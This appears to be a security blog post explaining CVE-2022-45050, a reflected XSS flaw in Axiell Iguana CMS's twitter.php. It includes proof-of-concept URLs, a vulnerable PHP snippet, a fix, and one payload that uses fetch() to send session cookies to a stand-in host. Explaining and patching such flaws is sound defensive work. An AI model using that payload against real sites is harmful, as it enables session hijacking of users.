CVE-2022-45050 - Reflected XSS Vulnerability in Axiell Iguana CMS – Detailed Exploit Guide

CVE-2022-45050 is a notable security flaw discovered in the popular content management system, Axiell Iguana CMS. This vulnerability is a classic example of reflected Cross-Site Scripting (XSS), present in the way the application handles user input on the twitter.php endpoint. In this post, we’ll break down how this bug works, why it’s dangerous, and how an attacker could exploit it to run malicious code in a victim's browser. We'll also provide simple code examples and reference links for further reading.

What Is CVE-2022-45050?

Axiell Iguana CMS is used by libraries and organizations around the world to manage and present online content. However, a security researcher recently discovered that the title parameter in the twitter.php endpoint fails to properly sanitize user-supplied input.

This makes the system vulnerable to reflected XSS. If an attacker can trick a user into clicking a crafted link, the attacker’s JavaScript can execute in the victim's browser under the site’s domain.

Why Does This Happen?

When a web application echoes back user input on a page without filtering or escaping it, any scripts in that input will run in the context of the user viewing the page. This lays the groundwork for reflected XSS, which can be used to:

Perform actions as the victim

In Iguana CMS, the lack of input sanitation on the title query parameter means that anything a user enters in this parameter gets directly output into the page's context.

Suppose the vulnerable link looks like this

https://example.com/twitter.php?title=Hello%20World

Anything placed after title= is reflected back by the PHP script. If an attacker replaces Hello%20World with a XSS payload, it will be executed.

Malicious Example

https://example.com/twitter.php?title=<script>alert('XSS!')</script>;

Below is a hypothetical, simplified snippet of the vulnerable part of twitter.php

<?php
// Assume $_GET['title'] is reflected back without sanitization
echo "<h1>" . $_GET['title'] . "</h1>";
?>

If a user visits a link where title contains a script, the script gets executed.

Open the following example URL (DO NOT DO THIS ON A PRODUCTION SYSTEM!)

https://example.com/twitter.php?title=<script>alert('Pwned by XSS')</script>

You should see a JavaScript alert box if the site is vulnerable.

A more dangerous exploit might be

https://example.com/twitter.php?title=<script>fetch('https://evil.example.com/?cookie='+document.cookie)</script>;

This sends the user’s session cookies to a remote attacker.

Example Fix

<?php
echo "<h1>" . htmlspecialchars($_GET['title'], ENT_QUOTES, 'UTF-8') . "</h1>";
?>

References and More Reading

- CVE Details Record for CVE-2022-45050
- Exploit Database – XSS Reflected Attacks
- OWASP: Cross-site Scripting (XSS)
- Axiell Iguana official site

Conclusion

CVE-2022-45050 in Axiell Iguana CMS shows that even well-used software can have basic, easy-to-exploit vulnerabilities. Reflected XSS issues like this are preventable with secure coding practices and regular input/output validation. Website administrators should patch their systems immediately and developers should ensure user data is never echoed to a page without proper escaping.

Stay vigilant: one overlooked line of code can become an attacker’s best friend.

Timeline

Published on: 12/01/2022 09:15:00 UTC
Last modified on: 01/09/2023 17:12:00 UTC